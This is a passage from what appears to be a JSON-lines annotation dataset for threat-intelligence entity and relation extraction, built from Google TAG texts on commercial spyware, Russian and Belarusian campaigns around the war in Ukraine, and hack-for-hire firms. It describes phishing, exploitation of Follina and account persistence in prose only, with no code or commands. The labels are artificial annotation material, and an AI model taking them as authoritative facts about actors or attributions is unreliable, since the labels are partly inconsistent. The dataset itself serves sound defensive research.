not otherwise be able to develop these capabilities in-house.","entities":[],"relations":[],"Comments":[]} {"id":4747,"text":"While use of surveillance technologies may be legal under national or international laws, they are found to be used by some state actors for purposes antithetical to democratic values: targeting dissidents, journalists, human rights workers, and opposition party politicians.","entities":[],"relations":[],"Comments":[]} {"id":4748,"text":"We have also observed proliferation risk from nation state actors attempting to gain access to the exploits of these vendors.","entities":[],"relations":[],"Comments":[]} {"id":4749,"text":"Last year, TAG identified an ongoing campaign targeting security researchers working on vulnerability research and development at different companies and organizations.","entities":[{"id":50658,"label":"identity","start_offset":11,"end_offset":14}],"relations":[],"Comments":[]} {"id":4751,"text":"In addition to these concerns, there are other reasons why this industry presents a risk more broadly across the Internet.","entities":[],"relations":[],"Comments":[]} {"id":4752,"text":"While vulnerability research is an important contributor to online safety when that research is used to improve the security of products, vendors stockpiling zero-day vulnerabilities in secret can pose a severe risk to the Internet when the vendor itself gets compromised.","entities":[],"relations":[],"Comments":[]} {"id":4753,"text":"This has happened to multiple spyware vendors over the past ten years, raising the specter that their stockpiles can be released publicly without warning.","entities":[],"relations":[],"Comments":[]} {"id":4754,"text":"The proliferation of commercial hacking tools is a threat to national security, making the Internet less safe and undermining the trust on which a vibrant, inclusive digital society depends.","entities":[],"relations":[],"Comments":[]} {"id":4755,"text":"This is why when Google discovers these activities, we not only take steps to protect users, but also disclose that information publicly to raise awareness and help the entire ecosystem, in line with our historical commitment to openness and democratic values.","entities":[{"id":50660,"label":"identity","start_offset":17,"end_offset":23}],"relations":[],"Comments":[]} {"id":4756,"text":"Across all Google products, we incorporate industry-leading security features and protections to keep our users safe.","entities":[{"id":50661,"label":"identity","start_offset":11,"end_offset":17}],"relations":[],"Comments":[]} {"id":4757,"text":"On Search, Google’s Safe Browsing is an industry-leading service to identify unsafe websites across the web and notify users and website owners of potential harm.","entities":[{"id":50662,"label":"SOFTWARE","start_offset":11,"end_offset":33}],"relations":[],"Comments":[]} {"id":4758,"text":"Google Safe Browsing helps protect over four billion devices every day by showing warnings to users when they attempt to navigate to unsafe sites or download harmful files.","entities":[{"id":50663,"label":"SOFTWARE","start_offset":0,"end_offset":20}],"relations":[],"Comments":[]} {"id":4759,"text":"Safe Browsing also notifies webmasters when their websites are compromised by malicious actors and helps them diagnose and resolve the problem so that their visitors stay safer.","entities":[{"id":50664,"label":"SOFTWARE","start_offset":0,"end_offset":13}],"relations":[],"Comments":[]} {"id":4760,"text":"On Gmail, we recommend certain Gmail security precautions to prevent spoofing, phishing, and spam.","entities":[{"id":50667,"label":"attack-pattern","start_offset":69,"end_offset":77},{"id":50665,"label":"SOFTWARE","start_offset":3,"end_offset":8},{"id":50666,"label":"SOFTWARE","start_offset":31,"end_offset":36},{"id":50668,"label":"attack-pattern","start_offset":79,"end_offset":87},{"id":50669,"label":"attack-pattern","start_offset":93,"end_offset":97}],"relations":[],"Comments":[]} {"id":4761,"text":"Spoofers may send forged messages using an organization’s real name or domain to subvert authentication measures.","entities":[],"relations":[],"Comments":[]} {"id":4762,"text":"We use email authentication to protect against email spoofing, which is when email content is changed to make the message appear from someone or somewhere other than the actual source.","entities":[],"relations":[],"Comments":[]} {"id":4763,"text":"And we offer other advanced phishing and malware protection to administrators to better protect their users.","entities":[],"relations":[],"Comments":[]} {"id":4764,"text":"By default, Gmail displays warnings and moves untrustworthy emails to the user’s spam folder.","entities":[{"id":50670,"label":"SOFTWARE","start_offset":12,"end_offset":17}],"relations":[],"Comments":[]} {"id":4765,"text":"However administrators can also use advanced security settings to enhance their users’ protection against suspicious attachments and scripts from untrusted senders.","entities":[],"relations":[],"Comments":[]} {"id":4766,"text":"For Android, through its entire development lifecycle, we subject the products to a rigorous security program.","entities":[{"id":50671,"label":"SOFTWARE","start_offset":4,"end_offset":11}],"relations":[],"Comments":[]} {"id":4767,"text":"The Android security process begins early in the development lifecycle, and each major feature of the platform is reviewed by engineering and security resources.","entities":[{"id":50672,"label":"SOFTWARE","start_offset":4,"end_offset":11}],"relations":[],"Comments":[]} {"id":4768,"text":"We ensure appropriate controls are built into the architecture of the system.","entities":[],"relations":[],"Comments":[]} {"id":4769,"text":"During the development stage, Android-created and open source components are subject to vigorous security reviews","entities":[{"id":50673,"label":"SOFTWARE","start_offset":30,"end_offset":37}],"relations":[],"Comments":[]} {"id":4770,"text":"For users, Android provides safety and control over how apps and third parties can access the data from their devices.","entities":[{"id":50674,"label":"SOFTWARE","start_offset":11,"end_offset":18}],"relations":[],"Comments":[]} {"id":4771,"text":"For example, users are provided visibility into the permissions requested by each app, and they are able to control those permissions.","entities":[],"relations":[],"Comments":[]} {"id":4772,"text":"We have also built additional tools to prevent successful attacks on devices that run Android once those devices are in users’ hands.","entities":[],"relations":[],"Comments":[]} {"id":4773,"text":"For example, Google Play Protect, our built-in malware protection for Android, continuously scans devices for potentially harmful applications.","entities":[{"id":50675,"label":"SOFTWARE","start_offset":13,"end_offset":32},{"id":50676,"label":"SOFTWARE","start_offset":70,"end_offset":77}],"relations":[],"Comments":[]} {"id":4774,"text":"Although our security precautions are robust, security issues can still occur, which is why we created a comprehensive security response process to respond to incidents.","entities":[],"relations":[],"Comments":[]} {"id":4775,"text":"Google manages a vulnerability rewards program (VRP), rewarding researchers millions of dollars for their contributions in securing our devices and platforms.","entities":[{"id":50677,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":4776,"text":"We also provide research grants to security researchers to help fund and support the research community.","entities":[],"relations":[],"Comments":[]} {"id":4777,"text":"This is all part of a larger strategy to keep Google products and users, as well as the Internet at large more secure.","entities":[{"id":50678,"label":"identity","start_offset":46,"end_offset":52}],"relations":[],"Comments":[]} {"id":4778,"text":"Project Zero is also a critical component of this strategy, pushing transparency and more timely patching of vulnerabilities.","entities":[{"id":50679,"label":"identity","start_offset":0,"end_offset":12}],"relations":[],"Comments":[]} {"id":4779,"text":"Finally, we also offer the leading tools to protect important civil society actors such as journalists, human rights workers, opposition party politicians, and campaign organizations – in other words, the users who are frequently targeted by surveillance tools.","entities":[],"relations":[],"Comments":[]} {"id":4780,"text":"Google developed Project Shield, a free protection against distributed denial of service (DDoS) attacks, to protect news media and human rights organization websites.","entities":[{"id":50680,"label":"identity","start_offset":0,"end_offset":6},{"id":50681,"label":"attack-pattern","start_offset":59,"end_offset":95}],"relations":[],"Comments":[]} {"id":4782,"text":"To protect high risk user accounts, we offer the Advanced Protection Program (APP), which is our highest form of account security.","entities":[],"relations":[],"Comments":[]} {"id":4783,"text":"APP has a strong track record protecting users – since the program’s inception, there are no documented cases of an account compromise via phishing.","entities":[{"id":50685,"label":"attack-pattern","start_offset":116,"end_offset":147}],"relations":[],"Comments":[]} {"id":4784,"text":" We believe it is time for government, industry and civil society to come together to change the incentive structure which has allowed these technologies to spread in secret.","entities":[],"relations":[],"Comments":[]} {"id":4785,"text":"The first step is to understand the scope of the problem.","entities":[],"relations":[],"Comments":[]} {"id":4786,"text":"We appreciate the Committee’s focus on this issue, and recommend the U.S. Intelligence Community prioritize identifying and analyzing threats from foreign commercial spyware providers as being on par with other major advanced threat actors.","entities":[{"id":50686,"label":"identity","start_offset":69,"end_offset":96}],"relations":[],"Comments":[]} {"id":4787,"text":"The U.S. should also consider ways to foster greater transparency in the marketplace, including setting heightened transparency requirements for the domestic surveillance industry.","entities":[{"id":50687,"label":"identity","start_offset":4,"end_offset":8}],"relations":[],"Comments":[]} {"id":4788,"text":"The U.S. could also set an example to other governments by reviewing and disclosing its own historical use of these tools.","entities":[{"id":50688,"label":"identity","start_offset":4,"end_offset":8}],"relations":[],"Comments":[]} {"id":4789,"text":"We welcome recent steps taken by the government in applying sanctions to the NSO Group and Candiru, and we believe other governments should consider expanding these restrictions.","entities":[{"id":50689,"label":"threat-actor","start_offset":77,"end_offset":86},{"id":50690,"label":"threat-actor","start_offset":91,"end_offset":98}],"relations":[],"Comments":[]} {"id":4790,"text":"Additionally, the U.S. government should consider a full ban on Federal procurement of commercial spyware technologies and contemplate imposing further sanctions to limit spyware vendors’ ability to operate in the U.S. and receive U.S. investment.","entities":[{"id":50692,"label":"identity","start_offset":214,"end_offset":218},{"id":50693,"label":"identity","start_offset":231,"end_offset":235},{"id":50691,"label":"identity","start_offset":18,"end_offset":33}],"relations":[],"Comments":[]} {"id":4791,"text":"The harms from this industry are amply evident by this point, and we believe they outweigh any benefit to continued use.","entities":[],"relations":[],"Comments":[]} {"id":4792,"text":"Finally, we urge the United States to lead a diplomatic effort to work with the governments of the countries who harbor problematic vendors, as well as those who employ these tools, to build support for measures that limit harms caused by this industry.","entities":[{"id":50694,"label":"identity","start_offset":21,"end_offset":34}],"relations":[],"Comments":[]} {"id":4793,"text":"Any one government’s ability to meaningfully impact this market is limited; only through a concerted international effort can this serious risk to online safety be mitigated.","entities":[],"relations":[],"Comments":[]} {"id":4794,"text":"Google is investing heavily as a company and as an industry to counter serious threats to our users.","entities":[{"id":50695,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":4795,"text":"In the modern world, we must be able to trust the devices we use every day and ensure that foreign adversaries do not have access to sophisticated exploits.","entities":[],"relations":[],"Comments":[]} {"id":4796,"text":"While we continue to fight these threats on a technical level, the providers of these capabilities operate openly in democratic countries.","entities":[],"relations":[],"Comments":[]} {"id":4797,"text":"Google is committed to leading the industry in detecting and disrupting these threats.","entities":[{"id":50696,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":4798,"text":"I thank the Committee for this attention on this critical issue.","entities":[],"relations":[],"Comments":[]} {"id":4799,"text":"Google’s Threat Analysis Group (TAG) continues to closely monitor the cybersecurity environment in Eastern Europe with regard to the war in Ukraine.","entities":[{"id":50699,"label":"location","start_offset":140,"end_offset":147},{"id":50697,"label":"identity","start_offset":0,"end_offset":36},{"id":50698,"label":"identity","start_offset":99,"end_offset":113}],"relations":[],"Comments":[]} {"id":4800,"text":"Many Russian government cyber assets have remained focused on Ukraine and related issues since the invasion began, while Russian APT activity outside of Ukraine largely remains the same.","entities":[{"id":50702,"label":"location","start_offset":62,"end_offset":69},{"id":50703,"label":"threat-actor","start_offset":121,"end_offset":132},{"id":50704,"label":"location","start_offset":153,"end_offset":160},{"id":50701,"label":"threat-actor","start_offset":5,"end_offset":36}],"relations":[{"id":986,"from_id":50701,"to_id":50702,"type":"targets"}],"Comments":[]} {"id":4801,"text":"TAG continues to disrupt campaigns from multiple sets of Russian government-backed attackers, some of which are detailed in our previous updates.","entities":[{"id":50705,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":4802,"text":"Similarly, Russian observed disinformation efforts are also focused on the war in Ukraine and TAG has disrupted coordinated influence operations from several actors including the Internet Research Agency and a Russian consulting firm as detailed in the TAG Bulletin.","entities":[{"id":50710,"label":"threat-actor","start_offset":179,"end_offset":203},{"id":50707,"label":"identity","start_offset":94,"end_offset":97},{"id":50709,"label":"attack-pattern","start_offset":28,"end_offset":42},{"id":50711,"label":"threat-actor","start_offset":210,"end_offset":233},{"id":50706,"label":"location","start_offset":82,"end_offset":89},{"id":50708,"label":"location","start_offset":11,"end_offset":18},{"id":50712,"label":"identity","start_offset":253,"end_offset":256}],"relations":[{"id":987,"from_id":50710,"to_id":50709,"type":"uses"},{"id":988,"from_id":50711,"to_id":50709,"type":"uses"},{"id":989,"from_id":50710,"to_id":50708,"type":"located-at"},{"id":990,"from_id":50711,"to_id":50708,"type":"located-at"},{"id":991,"from_id":50710,"to_id":50706,"type":"targets"},{"id":992,"from_id":50711,"to_id":50706,"type":"targets"}],"Comments":[]} {"id":4804,"text":"Here is a deeper look at some campaign activity TAG has observed since our last update: Turla, a group publicly attributed to Russia’s Federal Security Service (FSB), recently hosted Android apps on a domain spoofing the Ukrainian Azov Regiment.","entities":[{"id":50714,"label":"identity","start_offset":48,"end_offset":51},{"id":50715,"label":"threat-actor","start_offset":88,"end_offset":93},{"id":50719,"label":"SOFTWARE","start_offset":183,"end_offset":190},{"id":50716,"label":"location","start_offset":126,"end_offset":132},{"id":50717,"label":"identity","start_offset":135,"end_offset":165},{"id":50718,"label":"identity","start_offset":221,"end_offset":244}],"relations":[{"id":994,"from_id":50717,"to_id":50716,"type":"located-at"},{"id":995,"from_id":50715,"to_id":50717,"type":"attributed-to"},{"id":996,"from_id":50715,"to_id":50718,"type":"impersonates"},{"id":997,"from_id":50715,"to_id":50719,"type":"uses"}],"Comments":[]} {"id":4805,"text":"This is the first known instance of Turla distributing Android-related malware.","entities":[{"id":50720,"label":"threat-actor","start_offset":36,"end_offset":41},{"id":50721,"label":"SOFTWARE","start_offset":55,"end_offset":62}],"relations":[],"Comments":[]} {"id":4806,"text":"The apps were not distributed through the Google Play Store, but hosted on a domain controlled by the actor and disseminated via links on third party messaging services.","entities":[{"id":50722,"label":"SOFTWARE","start_offset":42,"end_offset":59}],"relations":[],"Comments":[]} {"id":4807,"text":"We believe there was no major impact on Android users and that the number of installs was miniscule.","entities":[{"id":50723,"label":"SOFTWARE","start_offset":40,"end_offset":47}],"relations":[],"Comments":[]} {"id":4808,"text":"The app is distributed under the guise of performing Denial of Service (DoS) attacks against a set of Russian websites.","entities":[{"id":50724,"label":"attack-pattern","start_offset":53,"end_offset":84}],"relations":[],"Comments":[]} {"id":4809,"text":"However, the 'DoS' consists only of a single GET request to the target website, not enough to be effective.","entities":[{"id":50725,"label":"attack-pattern","start_offset":14,"end_offset":17}],"relations":[],"Comments":[]} {"id":4810,"text":"The list of target websites for the app can be seen in the CyberChef recipe here.","entities":[{"id":50726,"label":"tools","start_offset":59,"end_offset":68}],"relations":[],"Comments":[]} {"id":4811,"text":"During our investigation into the Turla CyberAzov apps, we identified another Android app first seen in the wild in March 2022 that also claimed to conduct DoS attacks against Russian websites.","entities":[{"id":50729,"label":"SOFTWARE","start_offset":78,"end_offset":89},{"id":50730,"label":"TIME","start_offset":116,"end_offset":126},{"id":50731,"label":"attack-pattern","start_offset":156,"end_offset":159},{"id":50727,"label":"threat-actor","start_offset":34,"end_offset":39},{"id":50728,"label":"malware","start_offset":40,"end_offset":49}],"relations":[{"id":998,"from_id":50727,"to_id":50728,"type":"uses"}],"Comments":[]} {"id":4812,"text":"In this case, the Android app name was stopwar.apk (com.ddos.stopwar) and was distributed from the website stopwar.pro.","entities":[{"id":50733,"label":"malware","start_offset":39,"end_offset":50},{"id":50732,"label":"SOFTWARE","start_offset":18,"end_offset":29},{"id":50734,"label":"malware","start_offset":52,"end_offset":68},{"id":50735,"label":"DOMAIN","start_offset":107,"end_offset":118}],"relations":[{"id":999,"from_id":50735,"to_id":50734,"type":"hosts"},{"id":1000,"from_id":50735,"to_id":50733,"type":"hosts"}],"Comments":[]} {"id":4813,"text":"This app is quite different from the Turla apps described above and written by a different developer.","entities":[{"id":50736,"label":"threat-actor","start_offset":37,"end_offset":42}],"relations":[],"Comments":[]} {"id":4814,"text":"It also downloads a list of targets from an external site, but unlike the Turla apps, it continually sends requests to the target websites until it is stopped by the user.","entities":[{"id":50737,"label":"threat-actor","start_offset":74,"end_offset":79}],"relations":[],"Comments":[]} {"id":4815,"text":"Based on our analysis, we believe that the StopWar app was developed by pro-Ukrainian developers and was the inspiration for what Turla actors based their fake CyberAzov DoS app off of.","entities":[{"id":50738,"label":"SOFTWARE","start_offset":43,"end_offset":54},{"id":50740,"label":"malware","start_offset":155,"end_offset":177},{"id":50739,"label":"threat-actor","start_offset":130,"end_offset":135}],"relations":[{"id":1001,"from_id":50740,"to_id":50738,"type":"impersonates"},{"id":1003,"from_id":50740,"to_id":50739,"type":"authored-by"}],"Comments":[]} {"id":4816,"text":"Indicators: The Follina vulnerability (CVE-2022-30190), first disclosed in late May, received significant usage from both APT and cybercrime groups throughout June after it was patched by Microsoft.","entities":[{"id":50744,"label":"identity","start_offset":188,"end_offset":197},{"id":50745,"label":"TIME","start_offset":80,"end_offset":83},{"id":50743,"label":"TIME","start_offset":159,"end_offset":163},{"id":50742,"label":"vulnerability","start_offset":16,"end_offset":54}],"relations":[],"Comments":[]} {"id":4817,"text":"Follina is a remote code execution (RCE) vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT).","entities":[{"id":50748,"label":"SOFTWARE","start_offset":62,"end_offset":110},{"id":50746,"label":"vulnerability","start_offset":13,"end_offset":54},{"id":50747,"label":"vulnerability","start_offset":0,"end_offset":7}],"relations":[{"id":1004,"from_id":50746,"to_id":50747,"type":"duplicate-of"},{"id":1005,"from_id":50748,"to_id":50747,"type":"has"}],"Comments":[]} {"id":4818,"text":"Consistent with CERT-UA reporting, TAG observed multiple Russian GRU actors - APT28 and Sandworm - conduct campaigns exploiting the Follina vulnerability.","entities":[{"id":50750,"label":"identity","start_offset":35,"end_offset":38},{"id":50751,"label":"identity","start_offset":57,"end_offset":75},{"id":50752,"label":"threat-actor","start_offset":78,"end_offset":83},{"id":50753,"label":"threat-actor","start_offset":88,"end_offset":96},{"id":50749,"label":"identity","start_offset":16,"end_offset":23},{"id":50754,"label":"vulnerability","start_offset":132,"end_offset":153}],"relations":[{"id":1006,"from_id":50753,"to_id":50754,"type":"exploits"},{"id":1007,"from_id":50752,"to_id":50754,"type":"exploits"}],"Comments":[]} {"id":4819,"text":"The Sandworm campaign used compromised government accounts to send links to Microsoft Office documents hosted on compromised domains, primarily targeting media organizations in Ukraine.","entities":[{"id":50755,"label":"campaign","start_offset":4,"end_offset":21},{"id":50756,"label":"SOFTWARE","start_offset":76,"end_offset":92},{"id":50757,"label":"location","start_offset":177,"end_offset":184}],"relations":[],"Comments":[]} {"id":4820,"text":"TAG has also observed an increasing number of financially motivated actors targeting Ukraine.","entities":[{"id":50758,"label":"identity","start_offset":0,"end_offset":3},{"id":50759,"label":"location","start_offset":85,"end_offset":92}],"relations":[],"Comments":[]} {"id":4821,"text":"One recent campaign from a group tracked by CERT-UA as UAC-0098 delivered malicious documents with the Follina exploit in password-protected archives, impersonating the State Tax Service of Ukraine.","entities":[{"id":50760,"label":"identity","start_offset":44,"end_offset":51},{"id":50761,"label":"threat-actor","start_offset":55,"end_offset":63},{"id":50762,"label":"vulnerability","start_offset":103,"end_offset":118},{"id":50763,"label":"identity","start_offset":169,"end_offset":197}],"relations":[{"id":1008,"from_id":50761,"to_id":50763,"type":"impersonates"},{"id":1009,"from_id":50761,"to_id":50762,"type":"uses"}],"Comments":[]} {"id":4822,"text":"We assess this actor is a former initial ransomware access broker who previously worked with the Conti ransomware group distributing the IcedID banking trojan based on overlaps in infrastructure, tools used in previous campaigns, and a unique cryptor.","entities":[{"id":50765,"label":"malware","start_offset":137,"end_offset":158},{"id":50764,"label":"threat-actor","start_offset":97,"end_offset":102}],"relations":[{"id":1010,"from_id":50764,"to_id":50765,"type":"uses"}],"Comments":[]} {"id":4823,"text":"Ghostwriter\/UNC1151, a threat actor attributed to Belarus, has remained active targeting accounts of webmail and social media networks of Polish users.","entities":[{"id":50766,"label":"threat-actor","start_offset":0,"end_offset":11},{"id":50767,"label":"threat-actor","start_offset":12,"end_offset":19},{"id":50768,"label":"location","start_offset":50,"end_offset":57}],"relations":[{"id":1011,"from_id":50767,"to_id":50766,"type":"duplicate-of"},{"id":1012,"from_id":50766,"to_id":50768,"type":"attributed-to"}],"Comments":[]} {"id":4824,"text":"They continue to use the 'Browser in the Browser' phishing technique that TAG first observed and described in March.","entities":[{"id":50769,"label":"attack-pattern","start_offset":26,"end_offset":68},{"id":50770,"label":"identity","start_offset":74,"end_offset":77},{"id":50771,"label":"TIME","start_offset":110,"end_offset":115}],"relations":[],"Comments":[]} {"id":4825,"text":"An example of this technique, used to target Facebook users, can be seen in the screenshot below.","entities":[{"id":50772,"label":"SOFTWARE","start_offset":45,"end_offset":53}],"relations":[],"Comments":[]} {"id":4826,"text":"COLDRIVER, a Russian-based threat actor sometimes referred to as Callisto, continues to send credential phishing emails to targets including government and defense officials, politicians, NGOs and think tanks, and journalists.","entities":[{"id":50774,"label":"location","start_offset":13,"end_offset":20},{"id":50775,"label":"threat-actor","start_offset":65,"end_offset":73},{"id":50773,"label":"threat-actor","start_offset":0,"end_offset":9},{"id":50776,"label":"attack-pattern","start_offset":93,"end_offset":119}],"relations":[{"id":1013,"from_id":50773,"to_id":50774,"type":"located-at"},{"id":1014,"from_id":50775,"to_id":50773,"type":"duplicate-of"}],"Comments":[]} {"id":4827,"text":"In addition to including phishing links directly in the email, the attackers also link to PDFs and\/or DOCs, hosted on Google Drive and Microsoft One Drive, that contain a link to an attacker-controlled phishing domain.","entities":[{"id":50777,"label":"attack-pattern","start_offset":25,"end_offset":39},{"id":50779,"label":"SOFTWARE","start_offset":135,"end_offset":154},{"id":50778,"label":"SOFTWARE","start_offset":118,"end_offset":130}],"relations":[],"Comments":[]} {"id":4829,"text":"These phishing domains have been blocked through Google Safe Browsing – a service that identifies unsafe websites across the web and notifies users and website owners of potential harm.","entities":[{"id":50782,"label":"SOFTWARE","start_offset":49,"end_offset":69},{"id":50781,"label":"attack-pattern","start_offset":6,"end_offset":14}],"relations":[],"Comments":[]} {"id":4830,"text":"Recently observed COLDRIVER indicators: In another campaign tracked by CERT-UA as UAC-0056 we observed compromised email addresses of a Regional Prosecutor’s office of Ukraine leveraged to send malicious Microsoft Excel documents with VBA macros delivering Cobalt Strike.","entities":[{"id":50783,"label":"identity","start_offset":71,"end_offset":78},{"id":50785,"label":"SOFTWARE","start_offset":204,"end_offset":219},{"id":50786,"label":"tools","start_offset":257,"end_offset":270},{"id":50784,"label":"identity","start_offset":136,"end_offset":175},{"id":14710,"label":"threat-actor","start_offset":18,"end_offset":27},{"id":14713,"label":"threat-actor","start_offset":82,"end_offset":90}],"relations":[{"id":1015,"from_id":14713,"to_id":14710,"type":"duplicate-of"},{"id":1016,"from_id":14710,"to_id":50784,"type":"targets"},{"id":1017,"from_id":14710,"to_id":50785,"type":"uses"},{"id":1018,"from_id":14710,"to_id":50786,"type":"uses"}],"Comments":[]} {"id":4831,"text":"In just two days, the volume observed and categorized as spam by Gmail exceeded 4,500 emails.","entities":[{"id":50787,"label":"SOFTWARE","start_offset":65,"end_offset":70}],"relations":[],"Comments":[]} {"id":4833,"text":"As part of TAG's mission to counter serious threats to Google and our users, we've published analysis on a range of persistent threats including government-backed attackers, commercial surveillance vendors, and serious criminal operators.","entities":[{"id":50790,"label":"identity","start_offset":11,"end_offset":14},{"id":50789,"label":"identity","start_offset":55,"end_offset":61}],"relations":[],"Comments":[]} {"id":4834,"text":"Today, we're sharing intelligence on a segment of attackers we call hack-for-hire, whose niche focuses on compromising accounts and exfiltrating data as a service.","entities":[{"id":50791,"label":"attack-pattern","start_offset":68,"end_offset":81}],"relations":[],"Comments":[]} {"id":4835,"text":"In contrast to commercial surveillance vendors, who we generally observe selling a capability for the end user to operate, hack-for-hire firms conduct attacks themselves.","entities":[{"id":50792,"label":"attack-pattern","start_offset":123,"end_offset":136}],"relations":[],"Comments":[]} {"id":4836,"text":"They target a wide range of users and opportunistically take advantage of known security flaws when undertaking their campaigns.","entities":[],"relations":[],"Comments":[]} {"id":4837,"text":"Both, however, enable attacks by those who would otherwise lack the capabilities to do so.","entities":[],"relations":[],"Comments":[]} {"id":4838,"text":"We have seen hack-for-hire groups target human rights and political activists, journalists, and other high-risk users around the world, putting their privacy, safety and security at risk.","entities":[{"id":50793,"label":"attack-pattern","start_offset":13,"end_offset":26}],"relations":[],"Comments":[]} {"id":4839,"text":"They also conduct corporate espionage, handily obscuring their clients’ role.","entities":[],"relations":[],"Comments":[]} {"id":4840,"text":"To help users and defenders, we will provide examples of the hack-for-hire ecosystem from India, Russia, and the United Arab Emirates and context around their capabilities and persistence mechanisms.","entities":[{"id":50794,"label":"attack-pattern","start_offset":61,"end_offset":74},{"id":50795,"label":"location","start_offset":90,"end_offset":95},{"id":50797,"label":"location","start_offset":113,"end_offset":133},{"id":50796,"label":"location","start_offset":97,"end_offset":103}],"relations":[],"Comments":[]} {"id":4841,"text":"The hack-for-hire landscape is fluid, both in how the attackers organize themselves and in the wide range of targets they pursue in a single campaign at the behest of disparate clients.","entities":[],"relations":[],"Comments":[]} {"id":4842,"text":"Some hack-for-hire attackers openly advertise their products and services to anyone willing to pay, while others operate more discreetly selling to a limited audience.","entities":[{"id":50798,"label":"attack-pattern","start_offset":5,"end_offset":18}],"relations":[],"Comments":[]} {"id":4843,"text":"For example, TAG has observed Indian hack-for-hire firms work with third party private investigative services — intermediaries that reach out for services when a client requires them — and provide data exfiltrated from a successful operation.","entities":[{"id":50800,"label":"location","start_offset":30,"end_offset":36},{"id":50801,"label":"attack-pattern","start_offset":37,"end_offset":50},{"id":50799,"label":"identity","start_offset":13,"end_offset":16}],"relations":[],"Comments":[]} {"id":4844,"text":"This is detailed in depth in today’s Reuters investigation into the Indian hack-for-hire ecosystem.","entities":[{"id":50803,"label":"location","start_offset":68,"end_offset":74},{"id":50802,"label":"attack-pattern","start_offset":75,"end_offset":88}],"relations":[],"Comments":[]} {"id":4845,"text":"We have also observed Indian hack-for-hire firms work with freelance actors not directly employed by the firms themselves.","entities":[{"id":50804,"label":"location","start_offset":22,"end_offset":28},{"id":50805,"label":"identity","start_offset":29,"end_offset":48}],"relations":[{"id":1019,"from_id":50805,"to_id":50804,"type":"located-at"}],"Comments":[]} {"id":4846,"text":"The breadth of targets in hack-for-hire campaigns stands in contrast to many government-backed operations, which often have a clearer delineation of mission and targets.","entities":[{"id":50806,"label":"attack-pattern","start_offset":26,"end_offset":39}],"relations":[],"Comments":[]} {"id":4847,"text":"A recent campaign from an Indian hack-for-hire operator was observed targeting an IT company in Cyprus, an education institution in Nigeria, a fintech company in the Balkans and a shopping company in Israel.","entities":[{"id":50812,"label":"location","start_offset":200,"end_offset":206},{"id":50809,"label":"location","start_offset":96,"end_offset":102},{"id":50807,"label":"location","start_offset":26,"end_offset":32},{"id":50808,"label":"identity","start_offset":33,"end_offset":55},{"id":50810,"label":"location","start_offset":132,"end_offset":139},{"id":50811,"label":"location","start_offset":166,"end_offset":173}],"relations":[{"id":1020,"from_id":50808,"to_id":50807,"type":"located-at"},{"id":1021,"from_id":50808,"to_id":50809,"type":"targets"},{"id":1023,"from_id":50808,"to_id":50811,"type":"targets"},{"id":1024,"from_id":50808,"to_id":50812,"type":"targets"},{"id":1022,"from_id":50808,"to_id":50810,"type":"targets"}],"Comments":[]} {"id":4849,"text":"Since 2012, TAG has been tracking an interwoven set of Indian hack-for-hire actors, with many having previously worked for Indian offensive security providers Appin and Belltrox.","entities":[{"id":50814,"label":"TIME","start_offset":6,"end_offset":10},{"id":50815,"label":"location","start_offset":55,"end_offset":61},{"id":50816,"label":"attack-pattern","start_offset":62,"end_offset":75},{"id":50817,"label":"location","start_offset":123,"end_offset":129},{"id":50818,"label":"identity","start_offset":159,"end_offset":164},{"id":50819,"label":"identity","start_offset":169,"end_offset":177}],"relations":[],"Comments":[]} {"id":4850,"text":"One cluster of this activity frequently targets government, healthcare, and telecom sectors in Saudi Arabia, the United Arab Emirates, and Bahrain with credential phishing campaigns.","entities":[{"id":50820,"label":"location","start_offset":95,"end_offset":107},{"id":50821,"label":"location","start_offset":113,"end_offset":133},{"id":50822,"label":"location","start_offset":139,"end_offset":146},{"id":50823,"label":"campaign","start_offset":152,"end_offset":181}],"relations":[{"id":1025,"from_id":50823,"to_id":50822,"type":"targets"},{"id":1026,"from_id":50823,"to_id":50820,"type":"targets"},{"id":1027,"from_id":50823,"to_id":50821,"type":"targets"}],"Comments":[]} {"id":4851,"text":"These credential phishing campaigns have ranged from targeting specific government organizations to AWS accounts to Gmail accounts.","entities":[{"id":50825,"label":"campaign","start_offset":6,"end_offset":35},{"id":50826,"label":"SOFTWARE","start_offset":100,"end_offset":103},{"id":50827,"label":"SOFTWARE","start_offset":116,"end_offset":121}],"relations":[],"Comments":[]} {"id":4852,"text":"TAG has linked former employees of both Appin and Belltrox to Rebsec, a new firm that openly advertises corporate espionage as an offering on its company website.","entities":[{"id":50828,"label":"identity","start_offset":0,"end_offset":3},{"id":50829,"label":"identity","start_offset":40,"end_offset":45},{"id":50831,"label":"identity","start_offset":62,"end_offset":68},{"id":50830,"label":"identity","start_offset":50,"end_offset":58}],"relations":[],"Comments":[]} {"id":4854,"text":"While investigating a 2017 credential phishing campaign that targeted a prominent Russian anti-corruption journalist, we discovered the Russian attacker targeting other journalists, politicians across Europe, and various NGOs and non-profit organizations.","entities":[{"id":50833,"label":"TIME","start_offset":22,"end_offset":26},{"id":50835,"label":"location","start_offset":201,"end_offset":207},{"id":50834,"label":"campaign","start_offset":27,"end_offset":55},{"id":50836,"label":"identity","start_offset":213,"end_offset":254}],"relations":[],"Comments":[]} {"id":4856,"text":"This hack-for-hire actor has been publicly referred to as 'Void Balaur'.","entities":[{"id":50838,"label":"attack-pattern","start_offset":5,"end_offset":18},{"id":14831,"label":"threat-actor","start_offset":59,"end_offset":70}],"relations":[],"Comments":[]} {"id":4857,"text":"These campaigns were similar regardless of target, consisting of a credential phishing email with a link to an attacker-controlled phishing page.","entities":[{"id":50839,"label":"attack-pattern","start_offset":67,"end_offset":86}],"relations":[],"Comments":[]} {"id":4858,"text":"The lures ranged from fake Gmail and other webmail provider notifications to messages spoofing Russian government organizations.","entities":[{"id":50841,"label":"location","start_offset":95,"end_offset":102},{"id":50840,"label":"SOFTWARE","start_offset":27,"end_offset":32}],"relations":[],"Comments":[]} {"id":4859,"text":"After the target account was compromised, the attacker generally maintained persistence by granting an OAuth token to a legitimate email application like Thunderbird or generating an App Password to access the account via IMAP.","entities":[{"id":50842,"label":"SOFTWARE","start_offset":154,"end_offset":165}],"relations":[],"Comments":[]} {"id":4860,"text":"Both OAuth tokens and App Passwords are revoked when a user changes their password.","entities":[],"relations":[],"Comments":[]} {"id":4861,"text":"During our early investigation, TAG discovered the 